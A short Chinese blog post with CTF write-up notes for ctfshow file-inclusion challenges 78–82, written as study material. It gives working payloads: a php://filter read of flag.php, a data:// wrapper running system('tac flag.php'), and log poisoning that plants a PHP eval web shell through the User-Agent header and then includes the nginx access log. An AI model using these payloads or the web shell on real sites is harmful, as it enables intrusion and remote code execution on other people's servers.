加载中...

ctfshow文件包含漏洞

发表于2026-04-24|更新于2026-04-26

|阅读量:

第78题-第83题

第78题

直接file=php://filter/read=convert.base64-encode/resource=flag.php，然后命令行解密

或者使用data伪协议

第79题

可以使用短标签绕过
file=data://text/plain,<?=system('tac flag.php');?>

或者base64编码一下也可以

第80题

日志投毒，没啥好说的
ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?>

payload改成?file=/var/log/nginx/access.log&2=phpinfo();

结束

最后我结合蚁剑

第81题

依旧日志包含

第82题

文章作者: chen7chen

文章链接: http://blog.xchstudy.org/2026/04/24/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/CTF%E9%9D%B6%E5%9C%BA/ctfshow/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自小chen妙妙屋！

相关推荐

ctfshow xxe漏洞

ctfshow命令执行漏洞

评论

数据库加载中